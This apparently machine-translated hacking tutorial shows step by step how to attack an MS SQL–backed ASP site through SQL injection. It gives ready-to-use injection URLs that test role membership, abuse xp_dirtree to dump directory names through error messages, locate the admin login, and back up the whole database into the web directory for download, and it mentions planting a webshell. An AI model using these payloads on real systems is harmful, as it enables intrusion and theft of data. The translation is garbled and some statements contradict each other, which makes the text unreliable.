Weird SQL Injection

SQL Injection has ushered in another technological breakthrough with unique, novel, and Variant statements. Of course, we must make an article on the odd and special aspects to reach the core! That is the root of SQL injection technology. For a long time, ms SQL has brought us great convenience with its powerful storage process, and now the injection technology mainly relies on IIS error and ms SQL System prompt information to judge, so we can use SELECT to construct special statements so that system errors can be used to obtain more in-depth information, such as database explosion and table explosion. can we obtain detailed information? The answer is yes, but it is an amazing trick! Next, let's take a step-by-step approach!
Start the ms SQL query analyzer and enter:
PUBLIC permission for xp_dirtree
Statement: exec master. dbo. xp_dirtree c:

 

The returned information includes two fields subdirectory and depth. The Subdirectory field is the accept type, and the depth field is the integer field. What did you think? Don't worry. Let's continue!
Statement: create table dirs (paths varchar (100), id int)
Purpose: Are you familiar with table creation statements? However, the table created here plays a key role! That is to say, it is related to the above xp_dirtree. The fields are of the same type, paving the way for our next step. Now, the answer is coming soon!
Statement: insert dirs exec master. dbo. xp_dirtree c:
Purpose: Do you think it's strange? Is there a problem with the INSERT statement? NO! The principle is that execution can be performed as long as the fields returned by the table creation and storage process are defined in the same way! The difference from the conventional insert table (COLOUMN) VALUES (VALUES) is that the VALUES value cannot be placed in the storage process. dbo. xp_dirtree c:, to achieve the Table Writing effect-since tables can be written, we can use the undisclosed storage process to step by step achieve the information we want!
Do you understand the above? It doesn't matter if you don't understand it. You have to do the trick in practice, and practice is better than theory. So we have already done it! Let's take a look! The following uses a website as the base point for testing. Note: the permissions for the following tests are not SA permissions!
Statement: http://www.xxxxx.com/down/list.asp? Id = 1
Return: Microsoft ole db Provider for SQL Server Error 80040e14
There are unclosed quotation marks before the string.
/Down/list. asp, row 21
Test permission structure:
Statement 1: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (sysadmin ));--
Statement 2: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (serveradmin ));--
Statement 3: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (setupadmin ));--
Statement 4: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (securityadmin ));--
Statement 5: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (securityadmin ));--
Statement 6: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (diskadmin ));--
Statement 7: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (bulkadmin ));--
Statement 8: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER (bulkadmin ));--
Statement 9: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_MEMBER (db_owner ));--
In actual tests, only the DB_OWNER statement returns information normally. You can determine that the database connection permission is DB_OWNER (DOWN the database owner) and skip the database explosion step, in the past, anti-DDoS pro made it very clear that you can refer to "cross-database query how you want to play", and now we get the Administrator's table and management table information, there are two methods to further obtain permissions: this means that all fields are exposed, and the management background user password is used. The difficulty is to find the management background path, which is a physical activity. The other is to directly upload WEBSHELL through BACKUP, the difficulty lies in searching for WEB directories.
The chance of success of manually guessing the management background path is very low. We need to use XP_DIRTREE to obtain the information we want. The following method may be simpler! It was released for the first time. Maybe many of my friends are using it, but it is absolutely good! We will write the path to the table!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs (paths varchar (100), id int )--
Return: normal information! The table is successfully created! Continue!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree c :--
Return: normal information. It indicates that all the directories on drive C are successfully written! Great! The next step is to retrieve the table! Let it go.
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when you convert varchar value @ Inetpub to a column whose data type is int.
The directory name in the table is displayed in sequence!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs where paths not in (@ Inetpub ))--
Finally, use the same method to test and obtain the webpage directory under E: WEB. The last two options are as follows: one is to further obtain the website management background, and the other is to directly obtain WEBSHELL through BACKUP. The success rate of obtaining WEBSHELL from BAKCUP is not too high. Let's first guess its management background! XP_DIRTREE is used here, but because XP_DIRTREE is used to obtain a directory tree with a hard disk partition, it is easy for us to confuse it. So let's get the lower-level directory at a layer:
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs1 (paths varchar (100), id int )--
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree e: web --
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs1 )--
After a reverse field, a directory named xxxadminlogin is finally created. At first glance, we can see that this directory may be our dream management background directory! Suppress your excitement! We continue:
Statement: http: // http://www.xxxxx.com/down/xxxadminlogin/
The logon portal is displayed! GOOD! Haha, Lucky! There are users, passwords, logon URLs, and so on? Go in ......
The XP_DIRTREE storage process returns only the directory tree, and we cannot get the file tree. The login portal is under the root directory of the website. In addition, the obtained directory information should be determined by human guesses, therefore, the logon entry to the management backend through XP_DIRTREE is highly intrusive, and it is also a place of personal thinking.
Let's talk about how to use BACKUP to get WEBSHELL or directly back up the database with the current permission. Using the GETWEBSHELL tool that is ready for use to write Trojans, you can easily get a WEBSHELL. To further obtain member information, it is also a good way to manually back up the entire library to the web directory!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1; declare @ a sysname; set @ a = db_name (); backup database @ a to disk = e: webdown. bak ;--
Download it! Dear friends! Hey.
This article introduces a variant table writing method, which has little technical knowledge. It just provides you with a way of constructing statements. In this article, the website connection permission is not a member of the database server role group. There are not many built-in extended storage processes that can be exploited for injection. The extended storage process can be accessed only by users with relatively high permissions, therefore, a secure website is inseparable from the rational permission structure Allocation of managers. Have you noticed this?